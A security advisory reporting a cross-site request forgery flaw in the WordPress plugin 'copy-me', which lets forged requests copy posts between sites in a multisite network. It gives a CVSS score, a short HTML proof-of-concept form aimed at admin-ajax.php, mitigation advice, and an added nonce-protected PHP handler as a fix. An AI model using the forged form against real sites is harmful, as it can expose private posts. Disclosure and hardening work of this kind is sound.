copy-me vulnerable to CSRF allowing unauthenticated attacker to copy posts

Score  Vector   Complexity  Authentication  Confidentiality  Integrity  Availability
       Network  Medium      None            None             Partial    None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.


This plugin does not use nonces, so its copy action can be triggered by a forged cross-site request. Copying posts could allow taking a secret post from a non-public site within a multisite installation and moving it to a public site.

Proof of concept

Click submit and it will copy the post with ID 1 to the blog/site with ID 1:

<form method="POST" action="http://localhost/wp-admin/admin-ajax.php">
  <input type="text" name="action" value="copyme_copy_item">
  <input type="text" name="id" value="1">
  <input type="text" name="target" value="1">
  <input type="submit">
</form>

Mitigation/further actions

Disable the plugin. No fixed version is known.
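What a nonce-protected version of this action looks like, as an added example that is not the copy-me plugin's code: the admin-side form emits a nonce bound to the action, and the handler verifies it and checks capabilities before copying. The form, handler and all example_* names are hypothetical; the WordPress functions used are the standard nonce, capability and multisite APIs.

```php
<?php
// Added example, not the copy-me plugin's code: a WordPress AJAX copy handler
// protected against CSRF with a nonce and capability checks (all example_* names
// are hypothetical).
// Admin-side form: the nonce is bound to the action name, so a request forged
// from another origin cannot carry a valid token.
function example_copy_form( $post_id ) {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-ajax.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="example_copy_item">';
    echo '<input type="hidden" name="id" value="' . absint( $post_id ) . '">';
    echo '<input type="number" name="target" value="1">';
    wp_nonce_field( 'example_copy_item', 'example_nonce' );
    submit_button( 'Copy' );
    echo '</form>';
}

// wp_ajax_ (not wp_ajax_nopriv_): unauthenticated requests never reach the handler.
add_action( 'wp_ajax_example_copy_item', 'example_copy_item_handler' );
function example_copy_item_handler() {
    // 1. CSRF: dies with -1 unless 'example_nonce' holds a valid nonce for this action.
    check_ajax_referer( 'example_copy_item', 'example_nonce' );
    $post_id   = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    $target_id = isset( $_POST['target'] ) ? absint( $_POST['target'] ) : 0;
    if ( ! $post_id || ! $target_id ) {
        wp_send_json_error( 'missing id or target', 400 );
    }
    // 2. Authorization: the user must be able to read the source post...
    if ( ! current_user_can( 'read_post', $post_id ) ) {
        wp_send_json_error( 'cannot read source post', 403 );
    }
    // ...and to create content on the target site of the network.
    switch_to_blog( $target_id );
    $allowed = current_user_can( 'publish_posts' );
    restore_current_blog();
    if ( ! $allowed ) {
        wp_send_json_error( 'cannot publish on target site', 403 );
    }
    // 3. Only now copy; the copy lands as a draft rather than going live.
    $source = get_post( $post_id );
    switch_to_blog( $target_id );
    $new_id = wp_insert_post( array(
        'post_title'   => $source->post_title,
        'post_content' => $source->post_content,
        'post_status'  => 'draft',
    ) );
    restore_current_blog();
    wp_send_json_success( array( 'new_post_id' => $new_id ) );
}
```

With this in place, the proof-of-concept form above fails at check_ajax_referer(), because a page on another origin cannot obtain a nonce generated for the victim's session.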